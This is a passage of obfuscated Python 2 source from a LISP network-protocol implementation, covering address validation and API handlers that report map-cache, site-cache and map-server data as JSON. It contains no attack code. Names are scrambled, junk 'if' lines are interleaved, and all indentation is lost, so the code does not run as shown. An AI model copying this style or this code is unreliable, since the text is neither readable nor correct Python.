if 59 - 59: I1IiiI - OoOoOO00 * ooOoO0o / O0
if 54 - 54: Oo0Ooo % iIii1I11I1II1 * Oo0Ooo
for O0o00o000oO in i1I1i1Iiiiiii :
I1i = i1I1i1Iiiiiii [ O0o00o000oO ]
O0o00O0Oo0 = red ( O0o00o000oO , False )
lprint ( "Build Info-Request for private address {} ({})" . format ( O0o00O0Oo0 ,
I1i ) )
OO0oo00oOO = I1i if len ( i1I1i1Iiiiiii ) > 1 else None
for dest in iiiii1 :
lisp_send_info_request ( lisp_sockets , dest , port , OO0oo00oOO )
if 80 - 80: I1ii11iIi11i - I1ii11iIi11i
if 26 - 26: I1ii11iIi11i - I1IiiI * I1Ii111 % iIii1I11I1II1
if 77 - 77: o0oOOo0O0Ooo + I1Ii111 . OOooOOo . i1IIi . I1IiiI
if 100 - 100: ooOoO0o . i11iIiiIii + Ii1I - OOooOOo - i11iIiiIii - OoooooooOO
if 42 - 42: OoOoOO00 . I1IiiI / OoOoOO00 / I1ii11iIi11i . OoO0O00
if 67 - 67: Ii1I - O0 . OoooooooOO . I1Ii111 . o0oOOo0O0Ooo
if ( Ii1iiI != [ ] ) :
for ii1 in lisp_map_resolvers_list . values ( ) :
ii1 . resolve_dns_name ( )
if 73 - 73: I11i - oO0o . I1Ii111 + oO0o
if 48 - 48: IiII . IiII * o0oOOo0O0Ooo * II111iiii % ooOoO0o
return
if 40 - 40: I1ii11iIi11i
if 76 - 76: Oo0Ooo - I11i
if 82 - 82: OoO0O00 % oO0o . I11i / O0 - I1Ii111
if 39 - 39: I1IiiI
if 8 - 8: IiII * i1IIi * i1IIi * O0
if 69 - 69: Oo0Ooo
if 48 - 48: iII111i
if 11 - 11: i11iIiiIii * OoOoOO00 . OoO0O00
def lisp_valid_address_format ( kw , value ) :
if ( kw != "address" ) : return ( True )
if 47 - 47: Oo0Ooo % I1Ii111 + ooOoO0o
if 89 - 89: iII111i
if 29 - 29: I1ii11iIi11i . ooOoO0o * II111iiii / iII111i . OoooooooOO - OoOoOO00
if 99 - 99: IiII % O0 - I1Ii111 * OoO0O00
if 77 - 77: OoooooooOO - I11i / I1IiiI % OoOoOO00 - OOooOOo
if ( value [ 0 ] == "'" and value [ - 1 ] == "'" ) : return ( True )
if 37 - 37: ooOoO0o
if 22 - 22: I1ii11iIi11i + II111iiii / OoooooooOO % o0oOOo0O0Ooo * OoOoOO00 . Oo0Ooo
if 26 - 26: OoO0O00 % oO0o * Ii1I % OoooooooOO - oO0o
if 46 - 46: I1IiiI + OoO0O00 - O0 * O0
if ( value . find ( "." ) != - 1 ) :
O0o00o000oO = value . split ( "." )
if ( len ( O0o00o000oO ) != 4 ) : return ( False )
if 75 - 75: OOooOOo + iIii1I11I1II1 * OOooOOo
for o0O0O00oO in O0o00o000oO :
if ( o0O0O00oO . isdigit ( ) == False ) : return ( False )
if ( int ( o0O0O00oO ) > 255 ) : return ( False )
if 67 - 67: o0oOOo0O0Ooo - I1IiiI * iIii1I11I1II1
return ( True )
if 29 - 29: i1IIi / Ii1I / oO0o * iII111i
if 44 - 44: O0
if 95 - 95: OOooOOo + OOooOOo - OoOoOO00
if 83 - 83: II111iiii * ooOoO0o - O0 - i11iIiiIii
if 62 - 62: I1IiiI + II111iiii * iIii1I11I1II1 % iII111i + IiII / ooOoO0o
if ( value . find ( "-" ) != - 1 ) :
O0o00o000oO = value . split ( "-" )
for i1i1IIIIIIIi in [ "N" , "S" , "W" , "E" ] :
if ( i1i1IIIIIIIi in O0o00o000oO ) :
if ( len ( O0o00o000oO ) < 8 ) : return ( False )
return ( True )
if 14 - 14: iIii1I11I1II1 * I1ii11iIi11i + OOooOOo + O0
if 79 - 79: II111iiii - iII111i
if 89 - 89: O0 - OoO0O00
if 8 - 8: I1ii11iIi11i / oO0o - OoooooooOO + ooOoO0o + o0oOOo0O0Ooo % i11iIiiIii
if 32 - 32: O0 + IiII
if 93 - 93: OoOoOO00 - I11i / iII111i - iIii1I11I1II1 + I11i % oO0o
if 24 - 24: Ii1I / iIii1I11I1II1 + o0oOOo0O0Ooo
if ( value . find ( "-" ) != - 1 ) :
O0o00o000oO = value . split ( "-" )
if ( len ( O0o00o000oO ) != 3 ) : return ( False )
if 17 - 17: OOooOOo
for O00o in O0o00o000oO :
try : int ( O00o , 16 )
except : return ( False )
if 2 - 2: OoOoOO00 % ooOoO0o / OoO0O00 / Ii1I
return ( True )
if 26 - 26: I11i * ooOoO0o * OoO0O00 * I1Ii111 - OoooooooOO / o0oOOo0O0Ooo
if 14 - 14: Ii1I / II111iiii % IiII
if 81 - 81: oO0o + oO0o
if 27 - 27: OoOoOO00 % OoOoOO00 / o0oOOo0O0Ooo
if 9 - 9: Oo0Ooo
if ( value . find ( ":" ) != - 1 ) :
O0o00o000oO = value . split ( ":" )
if ( len ( O0o00o000oO ) < 2 ) : return ( False )
if 84 - 84: iII111i - oO0o * OoO0O00 / i11iIiiIii / oO0o
O0O0oOOo = False
OoO = 0
for O00o in O0o00o000oO :
OoO += 1
if ( O00o == "" ) :
if ( O0O0oOOo ) :
if ( len ( O0o00o000oO ) == OoO ) : break
if ( OoO > 2 ) : return ( False )
if 54 - 54: o0oOOo0O0Ooo + OOooOOo
O0O0oOOo = True
continue
if 24 - 24: ooOoO0o
try : int ( O00o , 16 )
except : return ( False )
if 7 - 7: ooOoO0o . OoooooooOO . iII111i * II111iiii . II111iiii / OOooOOo
return ( True )
if 46 - 46: Ii1I - Oo0Ooo / i1IIi % IiII - I1ii11iIi11i + OOooOOo
if 42 - 42: i1IIi - IiII % OOooOOo % iIii1I11I1II1
if 71 - 71: OoO0O00
if 72 - 72: II111iiii + o0oOOo0O0Ooo / i1IIi * Oo0Ooo / i1IIi
if 52 - 52: I1Ii111 % OoO0O00 . I1Ii111 * I1ii11iIi11i * OoOoOO00 + i1IIi
if ( value [ 0 ] == "+" ) :
O0o00o000oO = value [ 1 : : ]
for o0oooOo in O0o00o000oO :
if ( o0oooOo . isdigit ( ) == False ) : return ( False )
if 6 - 6: Ii1I * i1IIi + O0 % I1Ii111
return ( True )
if 82 - 82: II111iiii . IiII - O0
return ( False )
if 18 - 18: oO0o * OOooOOo
if 19 - 19: iIii1I11I1II1 / I1ii11iIi11i - I1ii11iIi11i / iIii1I11I1II1
if 42 - 42: iIii1I11I1II1 / OOooOOo - O0 * OoooooooOO / i1IIi
if 33 - 33: OOooOOo . o0oOOo0O0Ooo % OoO0O00 - I1Ii111 . OoooooooOO
if 96 - 96: II111iiii % I11i / Ii1I - i11iIiiIii
if 63 - 63: I1IiiI
if 15 - 15: iIii1I11I1II1 - I1ii11iIi11i % OoO0O00 * II111iiii / I11i + I11i
if 23 - 23: I1IiiI
if 51 - 51: i11iIiiIii / ooOoO0o - OoooooooOO + OoOoOO00 + oO0o
if 57 - 57: iIii1I11I1II1
if 19 - 19: Ii1I / o0oOOo0O0Ooo + O0 / iIii1I11I1II1 + II111iiii
if 3 - 3: oO0o % OoO0O00 % OOooOOo
def lisp_process_api ( process , lisp_socket , data_structure ) :
OO0 , oo0OoOO0000 = data_structure . split ( "%" )
if 30 - 30: OoO0O00 * I1ii11iIi11i + OoooooooOO % i11iIiiIii - ooOoO0o
lprint ( "Process API request '{}', parameters: '{}'" . format ( OO0 ,
oo0OoOO0000 ) )
if 15 - 15: O0 * OOooOOo * I11i + Ii1I * OoooooooOO + OOooOOo
Ii11i1IiII = [ ]
if ( OO0 == "map-cache" ) :
if ( oo0OoOO0000 == "" ) :
Ii11i1IiII = lisp_map_cache . walk_cache ( lisp_process_api_map_cache , Ii11i1IiII )
else :
Ii11i1IiII = lisp_process_api_map_cache_entry ( json . loads ( oo0OoOO0000 ) )
if 77 - 77: O0
if 98 - 98: iII111i - iII111i % i1IIi - I1Ii111 . I1IiiI % o0oOOo0O0Ooo
if ( OO0 == "site-cache" ) :
if ( oo0OoOO0000 == "" ) :
Ii11i1IiII = lisp_sites_by_eid . walk_cache ( lisp_process_api_site_cache ,
Ii11i1IiII )
else :
Ii11i1IiII = lisp_process_api_site_cache_entry ( json . loads ( oo0OoOO0000 ) )
if 38 - 38: IiII % OoOoOO00 . OOooOOo . I1ii11iIi11i
if 34 - 34: iII111i . i11iIiiIii + OoO0O00 + o0oOOo0O0Ooo / ooOoO0o - i11iIiiIii
if ( OO0 == "map-server" ) :
oo0OoOO0000 = { } if ( oo0OoOO0000 == "" ) else json . loads ( oo0OoOO0000 )
Ii11i1IiII = lisp_process_api_ms_or_mr ( True , oo0OoOO0000 )
if 63 - 63: ooOoO0o % OoO0O00 % ooOoO0o
if ( OO0 == "map-resolver" ) :
oo0OoOO0000 = { } if ( oo0OoOO0000 == "" ) else json . loads ( oo0OoOO0000 )
Ii11i1IiII = lisp_process_api_ms_or_mr ( False , oo0OoOO0000 )
if 28 - 28: IiII * I1Ii111 * o0oOOo0O0Ooo + ooOoO0o - IiII / IiII
if ( OO0 == "database-mapping" ) :
Ii11i1IiII = lisp_process_api_database_mapping ( )
if 73 - 73: iIii1I11I1II1 . I1ii11iIi11i + OOooOOo
if 51 - 51: I11i % Oo0Ooo * OOooOOo % OoooooooOO - OoOoOO00 % Ii1I
if 60 - 60: OoOoOO00 - IiII + OoO0O00
if 77 - 77: iIii1I11I1II1
if 92 - 92: IiII
Ii11i1IiII = json . dumps ( Ii11i1IiII )
oOO0O = lisp_api_ipc ( process , Ii11i1IiII )
lisp_ipc ( oOO0O , lisp_socket , "lisp-core" )
return
if 68 - 68: OOooOOo . IiII / iIii1I11I1II1 % i11iIiiIii
if 74 - 74: iII111i + i11iIiiIii
if 95 - 95: Ii1I
if 49 - 49: I1ii11iIi11i . i1IIi + OoO0O00 % O0 + OoO0O00
if 21 - 21: ooOoO0o * oO0o / OoooooooOO % ooOoO0o / O0
if 24 - 24: OoO0O00 - i11iIiiIii / i11iIiiIii * I1Ii111
if 20 - 20: IiII % iIii1I11I1II1 . iII111i + iIii1I11I1II1 + O0
def lisp_process_api_map_cache ( mc , data ) :
if 96 - 96: I1ii11iIi11i - IiII % OoooooooOO . iII111i
if 30 - 30: Oo0Ooo . OoooooooOO / Oo0Ooo / oO0o
if 44 - 44: I1ii11iIi11i % o0oOOo0O0Ooo / iIii1I11I1II1 - o0oOOo0O0Ooo / I11i * I1Ii111
if 49 - 49: iII111i / iII111i - OoOoOO00
if ( mc . group . is_null ( ) ) : return ( lisp_gather_map_cache_data ( mc , data ) )
if 89 - 89: ooOoO0o
if ( mc . source_cache == None ) : return ( [ True , data ] )
if 16 - 16: oO0o + oO0o + i1IIi + iIii1I11I1II1
if 93 - 93: I1IiiI - i11iIiiIii * I1Ii111 - O0 + iII111i
if 11 - 11: iII111i
if 100 - 100: OoooooooOO / ooOoO0o . OoO0O00
if 89 - 89: I11i % II111iiii
data = mc . source_cache . walk_cache ( lisp_gather_map_cache_data , data )
return ( [ True , data ] )
if 35 - 35: oO0o
if 65 - 65: II111iiii
if 87 - 87: oO0o / OoO0O00 - oO0o
if 69 - 69: i11iIiiIii
if 29 - 29: IiII . ooOoO0o / iII111i - OOooOOo / OOooOOo % Oo0Ooo
if 42 - 42: OoO0O00 . I1Ii111 . I1IiiI + Oo0Ooo * O0
if 35 - 35: Oo0Ooo / iII111i - O0 - OOooOOo * Oo0Ooo . i11iIiiIii
def lisp_gather_map_cache_data ( mc , data ) :
iIiiiIIiii = { }
iIiiiIIiii [ "instance-id" ] = str ( mc . eid . instance_id )
iIiiiIIiii [ "eid-prefix" ] = mc . eid . print_prefix_no_iid ( )
if ( mc . group . is_null ( ) == False ) :
iIiiiIIiii [ "group-prefix" ] = mc . group . print_prefix_no_iid ( )
if 43 - 43: OoOoOO00 % oO0o % OoO0O00 / Ii1I . I11i
iIiiiIIiii [ "uptime" ] = lisp_print_elapsed ( mc . uptime )
iIiiiIIiii [ "expires" ] = lisp_print_elapsed ( mc . uptime )
iIiiiIIiii [ "action" ] = lisp_map_reply_action_string [ mc . action ]
iIiiiIIiii [ "ttl" ] = "--" if mc . map_cache_ttl == None else str ( mc . map_cache_ttl / 60 )
if 86 - 86: I1Ii111 * i1IIi + IiII - OoOoOO00
if 14 - 14: I1ii11iIi11i / i11iIiiIii * I11i % o0oOOo0O0Ooo + IiII / I1ii11iIi11i
if 82 - 82: OOooOOo . oO0o
if 12 - 12: i11iIiiIii + II111iiii
if 49 - 49: OoooooooOO
iio0OOoO0 = [ ]
for OooO0ooO0o0OO in mc . rloc_set :
O0OooO0oo = { }
if ( OooO0ooO0o0OO . rloc_exists ( ) ) :
O0OooO0oo [ "address" ] = OooO0ooO0o0OO . rloc . print_address_no_iid ( )
if 48 - 48: i1IIi . IiII - O0 + OoooooooOO
if 6 - 6: I1Ii111 * OOooOOo + o0oOOo0O0Ooo . I1ii11iIi11i * I1Ii111
if ( OooO0ooO0o0OO . translated_port != 0 ) :
O0OooO0oo [ "encap-port" ] = str ( OooO0ooO0o0OO . translated_port )
if 6 - 6: oO0o / II111iiii
O0OooO0oo [ "state" ] = OooO0ooO0o0OO . print_state ( )
if ( OooO0ooO0o0OO . geo ) : O0OooO0oo [ "geo" ] = OooO0ooO0o0OO . geo . print_geo ( )
if ( OooO0ooO0o0OO . elp ) : O0OooO0oo [ "elp" ] = OooO0ooO0o0OO . elp . print_elp ( False )
if ( OooO0ooO0o0OO . rle ) : O0OooO0oo [ "rle" ] = OooO0ooO0o0OO . rle . print_rle ( False )
if ( OooO0ooO0o0OO . json ) : O0OooO0oo [ "json" ] = OooO0ooO0o0OO . json . print_json ( False )
if ( OooO0ooO0o0OO . rloc_name ) : O0OooO0oo [ "rloc-name" ] = OooO0ooO0o0OO . rloc_name
O0ooOoo0O000O = OooO0ooO0o0OO . stats . get_stats ( False , False )
if ( O0ooOoo0O000O ) : O0OooO0oo [ "stats" ] = O0ooOoo0O000O
O0OooO0oo [ "uptime" ] = lisp_print_elapsed ( OooO0ooO0o0OO . uptime )
O0OooO0oo [ "upriority" ] = str ( OooO0ooO0o0OO . priority )
O0OooO0oo [ "uweight" ] = str ( OooO0ooO0o0OO . weight )
O0OooO0oo [ "mpriority" ] = str ( OooO0ooO0o0OO . mpriority )
O0OooO0oo [ "mweight" ] = str ( OooO0ooO0o0OO . mweight )
i1iiI1iIi = OooO0ooO0o0OO . last_rloc_probe_reply
if ( i1iiI1iIi ) :
O0OooO0oo [ "last-rloc-probe-reply" ] = lisp_print_elapsed ( i1iiI1iIi )
O0OooO0oo [ "rloc-probe-rtt" ] = str ( OooO0ooO0o0OO . rloc_probe_rtt )
if 18 - 18: iIii1I11I1II1 % o0oOOo0O0Ooo
O0OooO0oo [ "rloc-hop-count" ] = OooO0ooO0o0OO . rloc_probe_hops
O0OooO0oo [ "recent-rloc-hop-counts" ] = OooO0ooO0o0OO . recent_rloc_probe_hops
if 64 - 64: i1IIi % oO0o
iII111I = [ ]
for I1i1IIiI in OooO0ooO0o0OO . recent_rloc_probe_rtts : iII111I . append ( str ( I1i1IIiI ) )
O0OooO0oo [ "recent-rloc-probe-rtts" ] = iII111I
if 66 - 66: IiII * i11iIiiIii
iio0OOoO0 . append ( O0OooO0oo )
if 64 - 64: i11iIiiIii . I1Ii111 % i11iIiiIii % I11i
iIiiiIIiii [ "rloc-set" ] = iio0OOoO0
if 56 - 56: o0oOOo0O0Ooo + ooOoO0o + OoooooooOO
data . append ( iIiiiIIiii )
return ( [ True , data ] )
if 64 - 64: OOooOOo / OoOoOO00
if 30 - 30: OOooOOo % I1Ii111 - i11iIiiIii
if 20 - 20: i1IIi * I11i / OoO0O00 / i1IIi / I1Ii111 * O0
if 95 - 95: Ii1I + Ii1I % IiII - IiII / OOooOOo
if 46 - 46: IiII + iII111i + II111iiii . iII111i - i11iIiiIii % OoO0O00
if 24 - 24: oO0o + IiII . o0oOOo0O0Ooo . OoooooooOO . i11iIiiIii / I1ii11iIi11i
if 49 - 49: IiII
def lisp_process_api_map_cache_entry ( parms ) :
oOo00Ooo0o0 = parms [ "instance-id" ]
oOo00Ooo0o0 = 0 if ( oOo00Ooo0o0 == "" ) else int ( oOo00Ooo0o0 )
if 1 - 1: oO0o / I11i
if 99 - 99: OoO0O00 % IiII + I1Ii111 - oO0o
if 28 - 28: OOooOOo - O0 - O0 % i11iIiiIii * OoooooooOO
if 60 - 60: OoooooooOO / i1IIi / i1IIi / Ii1I . IiII
I111o0oooO00o0 = lisp_address ( LISP_AFI_NONE , "" , 0 , oOo00Ooo0o0 )
I111o0oooO00o0 . store_prefix ( parms [ "eid-prefix" ] )
oO00o0oOoo = I111o0oooO00o0
O0O00Oo = I111o0oooO00o0
if 24 - 24: O0
if 6 - 6: I1IiiI . i11iIiiIii . OoooooooOO . I1IiiI . o0oOOo0O0Ooo
if 65 - 65: i11iIiiIii
if 46 - 46: i11iIiiIii
if 70 - 70: i1IIi + o0oOOo0O0Ooo
oOoooOOO0o0 = lisp_address ( LISP_AFI_NONE , "" , 0 , oOo00Ooo0o0 )
if ( parms . has_key ( "group-prefix" ) ) :
oOoooOOO0o0 . store_prefix ( parms [ "group-prefix" ] )
oO00o0oOoo = oOoooOOO0o0
if 44 - 44: iII111i . II111iiii % o0oOOo0O0Ooo
if 29 - 29: i11iIiiIii * i1IIi
Ii11i1IiII = [ ]
OoOoooooO00oo = lisp_map_cache_lookup ( O0O00Oo , oO00o0oOoo )
if ( OoOoooooO00oo ) : iI1i11I1III11 , Ii11i1IiII = lisp_process_api_map_cache ( OoOoooooO00oo , Ii11i1IiII )
return ( Ii11i1IiII )
if 36 - 36: OoO0O00 * I11i . ooOoO0o
if 50 - 50: oO0o * OoOoOO00 / OoO0O00 / ooOoO0o + II111iiii
if 55 - 55: II111iiii - IiII
if 24 - 24: oO0o % Ii1I / i1IIi
if 84 - 84: i1IIi
if 53 - 53: OoooooooOO - i1IIi - Ii1I
if 73 - 73: I1ii11iIi11i - Ii1I * o0oOOo0O0Ooo
def lisp_process_api_site_cache ( se , data ) :
if 29 - 29: o0oOOo0O0Ooo % IiII % OOooOOo + OoooooooOO - o0oOOo0O0Ooo
if 34 - 34: Ii1I
if 5 - 5: II111iiii . I1ii11iIi11i
if 85 - 85: I1Ii111 . IiII + II111iiii
if ( se . group . is_null ( ) ) : return ( lisp_gather_site_cache_data ( se , data ) )
if 92 - 92: iII111i / o0oOOo0O0Ooo * oO0o . I11i % o0oOOo0O0Ooo
if ( se . source_cache == None ) : return ( [ True , data ] )
if 87 - 87: Ii1I / Oo0Ooo % iIii1I11I1II1 / iII111i
if 42 - 42: OoO0O00 . I1IiiI . OOooOOo + ooOoO0o
if 87 - 87: OOooOOo
if 44 - 44: Oo0Ooo + iIii1I11I1II1
if 67 - 67: iII111i . OOooOOo / ooOoO0o * iIii1I11I1II1
data = se . source_cache . walk_cache ( lisp_gather_site_cache_data , data )
return ( [ True , data ] )
if 29 - 29: I1Ii111 / OoOoOO00 % I1ii11iIi11i * IiII / II111iiii
if 10 - 10: O0 / I11i
if 29 - 29: i11iIiiIii % I11i
if 49 - 49: I11i
if 69 - 69: o0oOOo0O0Ooo . O0 * I11i
if 92 - 92: OoO0O00 . O0 / Ii1I % Oo0Ooo . Ii1I
if 40 - 40: o0oOOo0O0Ooo - Ii1I . iII111i - O0
def lisp_process_api_ms_or_mr ( ms_or_mr , data ) :
III1 = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
II11Iii11III = data [ "dns-name" ] if data . has_key ( "dns-name" ) else None
if ( data . has_key ( "address" ) ) :
III1 . store_address ( data [ "address" ] )
if 53 - 53: Oo0Ooo - I1IiiI * O0 . II111iiii
if 72 - 72: ooOoO0o - Ii1I . Ii1I . I11i / OoooooooOO + Ii1I
Oooo0oOOO0 = { }
if ( ms_or_mr ) :
for Ii1IIII in lisp_map_servers_list . values ( ) :
if ( II11Iii11III ) :
if ( II11Iii11III != Ii1IIII . dns_name ) : continue
else :
if ( III1 . is_exact_match ( Ii1IIII . map_server ) == False ) : continue
if 32 - 32: O0
if 42 - 42: i1IIi * I1ii11iIi11i * OoOoOO00
Oooo0oOOO0 [ "dns-name" ] = Ii1IIII . dns_name
Oooo0oOOO0 [ "address" ] = Ii1IIII . map_server . print_address_no_iid ( )
Oooo0oOOO0 [ "ms-name" ] = "" if Ii1IIII . ms_name == None else Ii1IIII . ms_name
return ( [ Oooo0oOOO0 ] )
if 43 - 43: I1ii11iIi11i % I1ii11iIi11i % i1IIi
else :
for ii1 in lisp_map_resolvers_list . values ( ) :
if ( II11Iii11III ) :
if ( II11Iii11III != ii1 . dns_name ) : continue
else :
if ( III1 . is_exact_match ( ii1 . map_resolver ) == False ) : continue
if 56 - 56: I1IiiI - OoO0O00 - iII111i . o0oOOo0O0Ooo . I1Ii111
if 70 - 70: iIii1I11I1II1 - I11i
Oooo0oOOO0 [ "dns-name" ] = ii1 . dns_name
Oooo0oOOO0 [ "address" ] = ii1 . map_resolver . print_address_no_iid ( )
Oooo0oOOO0 [ "mr-name" ] = "" if ii1 . mr_name == None else ii1 . mr_name
return ( [ Oooo0oOOO0 ] )
if 2 - 2: oO0o / II111iiii * OoO0O00
if 71 - 71: i1IIi + I11i * OoO0O00 . OOooOOo + oO0o
return ( [ ] )
if 40 - 40: OOooOOo
if 14 - 14: OoooooooOO - OoooooooOO % i11iIiiIii % ooOoO0o / ooOoO0o
if 33 - 33: iII111i / i1IIi . II111iiii % I1ii11iIi11i
if 74 - 74: iII111i / OOooOOo / O0 / iIii1I11I1II1 + IiII
if 26 - 26: OOooOOo % i1IIi . I1Ii111 / O0 + I1Ii111
if 39 - 39: I1ii11iIi11i * I1IiiI * II111iiii . Oo0Ooo % I1IiiI
if 100 - 100: iIii1I11I1II1 - OoooooooOO * OoooooooOO - iII111i / ooOoO0o
if 98 - 98: OoO0O00 + oO0o - II111iiii
def lisp_process_api_database_mapping ( ) :
Ii11i1IiII = [ ]
if 84 - 84: Oo0Ooo . OoOoOO00 - iII111i
for o00o0oOo0o0O in lisp_db_list :
iIiiiIIiii = { }
iIiiiIIiii [ "eid-prefix" ] = o00o0oOo0o0O . eid . print_prefix ( )
if ( o00o0oOo0o0O . group . is_null ( ) == False ) :
iIiiiIIiii [ "group-prefix" ] = o00o0oOo0o0O . group . print_prefix ( )
if 5 - 5: OoooooooOO . O0 / OOooOOo + I11i - Ii1I
if 77 - 77: iIii1I11I1II1 * Oo0Ooo . IiII / oO0o + O0
OO000 = [ ]
for O0OooO0oo in o00o0oOo0o0O . rloc_set :
OooO0ooO0o0OO = { }
if ( O0OooO0oo . rloc . is_null ( ) == False ) :
OooO0ooO0o0OO [ "rloc" ] = O0OooO0oo . rloc . print_address_no_iid ( )
if 76 - 76: iII111i + o0oOOo0O0Ooo - OoooooooOO * oO0o % OoooooooOO - O0
if ( O0OooO0oo . rloc_name != None ) : OooO0ooO0o0OO [ "rloc-name" ] = O0OooO0oo . rloc_name
if ( O0OooO0oo . interface != None ) : OooO0ooO0o0OO [ "interface" ] = O0OooO0oo . interface
i1IIIIIi111 = O0OooO0oo . translated_rloc
if ( i1IIIIIi111 . is_null ( ) == False ) :
OooO0ooO0o0OO [ "translated-rloc" ] = i1IIIIIi111 . print_address_no_iid ( )
if 10 - 10: o0oOOo0O0Ooo + ooOoO0o + Oo0Ooo
if ( OooO0ooO0o0OO != { } ) : OO000 . append ( OooO0ooO0o0OO )
if 67 - 67: I1IiiI / i11iIiiIii - I1Ii111 % OoooooooOO
if 36 - 36: oO0o % iII111i % oO0o
if 56 - 56: ooOoO0o - O0 + iII111i % I11i / i1IIi
if 78 - 78: i1IIi . iIii1I11I1II1
if 70 - 70: O0 + II111iiii % IiII / I1Ii111 - IiII
iIiiiIIiii [ "rlocs" ] = OO000
if 58 - 58: II111iiii * oO0o - i1IIi . I11i
if 23 - 23: OoO0O00 - I1IiiI * i11iIiiIii
if 62 - 62: OoO0O00 . i11iIiiIii / i1IIi
if 3 - 3: OoO0O00 + O0 % Oo0Ooo * Oo0Ooo % i11iIiiIii
Ii11i1IiII . append ( iIiiiIIiii )
if 29 - 29: ooOoO0o / iII111i / OOooOOo - iIii1I11I1II1
return ( Ii11i1IiII )
if 31 - 31: i1IIi * Ii1I
if 94 - 94: oO0o / Ii1I % iIii1I11I1II1 + i1IIi / O0 - iII111i
if 77 - 77: o0oOOo0O0Ooo - IiII . i1IIi
if 70 - 70: i1IIi . I1Ii111 . iII111i - OoOoOO00 + II111iiii + OOooOOo
if 52 - 52: OOooOOo . OoOoOO00 - ooOoO0o % i1IIi
if 15 - 15: oO0o
if 6 - 6: oO0o . iIii1I11I1II1 - I1ii11iIi11i % IiII
def lisp_gather_site_cache_data ( se , data ) :
iIiiiIIiii = { }
iIiiiIIiii [ "site-name" ] = se . site . site_name
iIiiiIIiii [ "instance-id" ] = str ( se . eid . instance_id )
iIiiiIIiii [ "eid-prefix" ] = se . eid . print_prefix_no_iid ( )
if ( se . group . is_null ( ) == False ) :
iIiiiIIiii [ "group-prefix" ] = se . group . print_prefix_no_iid ( )
if 58 - 58: iII111i * oO0o / iII111i - Oo0Ooo / I1Ii111 * oO0o
iIiiiIIiii [ "registered" ] = "yes" if se . registered else "no"
iIiiiIIiii [ "first-registered" ] = lisp_print_elapsed ( se . first_registered )
iIiiiIIiii [ "last-registered" ] = lisp_print_elapsed ( se . last_registered )
if 63 - 63: oO0o . IiII . o0oOOo0O0Ooo
O0o00o000oO = se . last_registerer
O0o00o000oO = "none" if O0o00o000oO . is_null ( ) else O0o00o000oO . print_address ( )
iIiiiIIiii [ "last-registerer" ] = O0o00o000oO
iIiiiIIiii [ "ams" ] = "yes" if ( se . accept_more_specifics ) else "no"
iIiiiIIiii [ "dynamic" ] = "yes" if ( se . dynamic ) else "no"
iIiiiIIiii [ "site-id" ] = str ( se . site_id )
if ( se . xtr_id_present ) :
iIiiiIIiii [ "xtr-id" ] = "0x" + lisp_hex_string ( se . xtr_id )
if 16 - 16: iII111i . I11i - Oo0Ooo / I1IiiI + OoOoOO00
if 14 - 14: iIii1I11I1II1 / i11iIiiIii - o0oOOo0O0Ooo . iII111i * OoO0O00
if 5 - 5: Ii1I + OoOoOO00 % I11i + IiII
if 55 - 55: OoooooooOO + oO0o . o0oOOo0O0Ooo % iIii1I11I1II1 - I1Ii111
if 40 - 40: I1IiiI . o0oOOo0O0Ooo - Oo0Ooo
iio0OOoO0 = [ ]
for OooO0ooO0o0OO in se . registered_rlocs :
O0OooO0oo = { }
O0OooO0oo [ "address" ] = OooO0ooO0o0OO . rloc . print_address_no_iid ( ) if OooO0ooO0o0OO . rloc_exists ( ) else "none"
if 44 - 44: Ii1I % OoO0O00 * oO0o * OoO0O00
if 7 - 7: I1Ii111 % i1IIi . I11i . O0 / i1IIi
if ( OooO0ooO0o0OO . geo ) : O0OooO0oo [ "geo" ] = OooO0ooO0o0OO . geo . print_geo ( )
if ( OooO0ooO0o0OO . elp ) : O0OooO0oo [ "elp" ] = OooO0ooO0o0OO . elp . print_elp ( False )
if ( OooO0ooO0o0OO . rle ) : O0OooO0oo [ "rle" ] = OooO0ooO0o0OO . rle . print_rle ( False )
if ( OooO0ooO0o0OO . json ) : O0OooO0oo [ "json" ] = OooO0ooO0o0OO . json . print_json ( False )
if ( OooO0ooO0o0OO . rloc_name ) : O0OooO0oo [ "rloc-name" ] = OooO0ooO0o0OO . rloc_name
O0OooO0oo [ "uptime" ] = lisp_print_elapsed ( OooO0ooO0o0OO . uptime )
O0OooO0oo [ "upriority" ] = str ( OooO0ooO0o0OO . priority )
O0OooO0oo [ "uweight" ] = str ( OooO0ooO0o0OO . weight )
O0OooO0oo [ "mpriority" ] = str ( OooO0ooO0o0OO . mpriority )
O0OooO0oo [ "mweight" ] = str ( OooO0ooO0o0OO . mweight )
if 56 - 56: Oo0Ooo
iio0OOoO0 . append ( O0OooO0oo )
if 21 - 21: i11iIiiIii * o0oOOo0O0Ooo + Oo0Ooo
iIiiiIIiii [ "registered-rlocs" ] = iio0OOoO0
if 20 - 20: IiII / OoooooooOO / O0 / I1Ii111 * ooOoO0o
data . append ( iIiiiIIiii )
return ( [ True , data ] )
if 45 - 45: ooOoO0o / Oo0Ooo % o0oOOo0O0Ooo . ooOoO0o
if 19 - 19: o0oOOo0O0Ooo % I11i . I1ii11iIi11i
if 70 - 70: Oo0Ooo - I11i / I1ii11iIi11i % OoO0O00 % II111iiii
if 72 - 72: i11iIiiIii * I11i
if 69 - 69: I1Ii111 . Ii1I * I1ii11iIi11i % I11i - o0oOOo0O0Ooo
if 30 - 30: ooOoO0o / Oo0Ooo * iII111i % OoooooooOO / I1ii11iIi11i
if 64 - 64: OoooooooOO
def lisp_process_api_site_cache_entry ( parms ) :
oOo00Ooo0o0 = parms [ "instance-id" ]
oOo00Ooo0o0 = 0 if ( oOo00Ooo0o0 == "" ) else int ( oOo00Ooo0o0 )
if 41 - 41: Ii1I . I11i / oO0o * OoooooooOO
if 98 - 98: I1ii11iIi11i - O0 + i11iIiiIii
if 71 - 71: O0 - OoooooooOO
if 82 - 82: i11iIiiIii * II111iiii % IiII
I111o0oooO00o0 = lisp_address ( LISP_AFI_NONE , "" , 0 , oOo00Ooo0o0 )
I111o0oooO00o0 . store_prefix ( parms [ "eid-prefix" ] )
if 80 - 80: Ii1I . i11iIiiIii % oO0o * o0oOOo0O0Ooo
if 56 - 56: I1Ii111 % iII111i / II111iiii - Oo0Ooo - Oo0Ooo - iIii1I11I1II1
if 67 - 67: iII111i
if 80 - 80: Ii1I . iII111i * I1IiiI * Ii1I
if 82 - 82: OoO0O00 % OoOoOO00 * i11iIiiIii . OoO0O00 . I1ii11iIi11i + Ii1I
oOoooOOO0o0 = lisp_address ( LISP_AFI_NONE , "" , 0 , oOo00Ooo0o0 )
if ( parms . has_key ( "group-prefix" ) ) :
